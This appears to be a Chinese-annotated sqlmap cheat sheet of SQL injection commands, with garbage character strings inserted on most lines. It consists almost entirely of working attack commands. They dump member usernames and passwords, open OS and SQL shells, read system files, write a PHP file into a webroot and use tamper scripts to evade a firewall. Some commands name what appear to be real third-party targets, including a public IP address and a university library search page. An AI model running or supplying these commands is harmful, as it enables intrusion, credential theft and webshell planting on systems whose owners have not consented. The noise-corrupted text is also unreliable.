/pentest/database/sqlmap1 ]9 d, Y" E$ a$ q" k, f
J$ ]; {% Q. P' y6 e1 rupdate :::::> in the folder after execute following order : svn update& K2 Z. v1 t4 K; P8 H
, { q( P& E7 J! M& [7 ~
sqlmap.py -r 1.txt --current-db& Q0 \0 \) V2 l! g
- E" m- ^1 r3 e* Bv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
/ h2 I+ e' {8 @2 {1 T" X; ~, q3 s( M6 D4 A* i, j; B' R
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 1 h4 I5 E% i% p6 P. |1 w0 l5 f$ C
猜解数据库
" V# Z. | ~4 I* R' h./sqlmap.py -u "injection-url" --dbs
2 t' F/ D* R' B) G$ k" K9 |sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py": R( X3 F) |; T! L b
! x/ U: W- {) d& x. u# b. Y0 X% d$ P
猜解表名
5 Y! {- l7 E! R./sqlmap.py -u "injection-url" -D database_name --tables
1 f9 k& L/ v8 \9 O. z
8 K; ~& A. _+ u" Esqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
$ \- W I0 j9 C2 p- E8 ~9 W9 esqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
( ]- e4 _/ \8 o! [' @0 {
# [8 w: y W8 F7 H2 V! G1 [sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump7 G7 l* C4 T- [) E
! C, \+ j+ g: c. ?: Q e: a
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
/ t. b A! j* c0 _9 @+ E2 ^6 `9 o3 Nsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
" S" j, C" H. l0 c$ X" ksqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 5 E8 H4 g- i& d1 P: O
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
8 h$ r4 `" @, b5 S" _9 u5 ~
, [# [. \' @7 i% p3 zsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"3 ~! S* q2 ^( J! |/ o1 V
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
7 h/ Q+ X6 j/ {( ssqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
/ ^; w2 M% B; J# G9 @: T" c. asqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 t, X* b2 h, A- Nsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump1 m* a$ [/ H1 n" m: \' V% v1 h7 I
5 q3 d1 e' O* Q) u$ A7 @
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
}9 G( L5 \' r' }sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
" `! H% A2 L. X. A# G0 l! ?9 d0 n: Z! X( _8 A
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst". G/ O& K% M1 d- b
猜解列名
+ y% N0 e- y' _. F./sqlmap.py -u "injection-url" -D database_name -T table_name --columns8 `" }. [: \; e% i) c- j
; b- |7 W) f2 o' W7 |$ t2 y4 s! z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
' ~$ b$ Z& S! {0 [% Msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 3 D: e- @( ]& f) o D/ m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
' H5 S. {2 r; T' x
& z- d; S3 C: o, @3 @- qsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"& T/ [/ \9 f& b3 w* R$ b
&submit=Go; `, V6 [# g/ o7 S. C4 z3 a+ E
猜解值* \7 p% f1 `9 L( w* O$ V7 H2 u
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
$ k% l0 R3 o8 B1 ^9 l========================================================
$ r- A3 A9 [0 }( o3 \$ s# B搜索表名中包括mana字符的& Z2 f- d4 F% b/ p
/sqlmap.py -u "injection-url" -T mana --search* P* u7 B5 K* c1 d' D8 X
返回一个交互式sql shell" ~' Q2 x+ L; q' L8 A0 h
/sqlmap.py -u "injection-url" --sql-shell
: j5 ^' M' E$ {4 a读取指定文件(需权限)2 ?% M5 ?: w1 B; k- a
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
+ J! y) B- E, |查看当前 用户 及 数据库 6 h. G" v+ j8 O, a0 z
/sqlmap.py -u "injection-url" --current-user --current-db% o! o8 p5 Q0 a: ?
本地文件 写入 远程目标绝对路径
9 P3 V: x- O- s4 x3 x/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径$ S! e+ E+ r! G* N( k& f
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 9 @7 |. L+ z3 _0 B( r
^' t& ^1 B$ o) F
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
- j6 n" v( T" U( f; |; N- F6 V查看某用的权限, Z" f& v( c _& u6 y2 O( j5 y8 u1 v
/sqlmap.py -u "injection-url" --privileges -U root
0 H' h k# j9 K, x7 e查看当前用户是否为dba
5 f3 p! P% a* Z3 X7 `/sqlmap.py -u "injection-url" --is-dba4 U |2 Q( A8 @% E- |* N
读取所有数据库用户或指定数据库用户的密码, b; B% {/ h' I7 k/ ?
sqlmap.py -r 1.txt --users --passwords
3 u' ?; A' b, A0 i* @8 f' ksqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
4 O. Q4 P# P8 B( W+ ]% K# `1 |
/sqlmap.py -u "injection-url" --passwords -U root: k% g7 N' V* R- d" g
/ P1 U+ U, S$ N. l
--start&&--stop 与 --first&&--last 的区别
, b! M( Y$ x- h, V ]5 L) _/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
2 N' ~" d2 ?! L0 @, z. a+ e" O/ X3 y6 X) x% B9 z3 u
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
. y& }" k3 u' P4 s! y' ?/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
% P; Y- d+ k& p% t7 q, k/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns8 D4 R. \$ \3 ]% t4 h- F6 d, W! r
. I! j& u% S" Z! q0 P; }
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……). n! K' C/ N5 b1 ]- x6 C( \( }
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
! w6 K) E& O; R0 x9 h8 A; U
; f( }3 k, M. w& x" K; X/ J |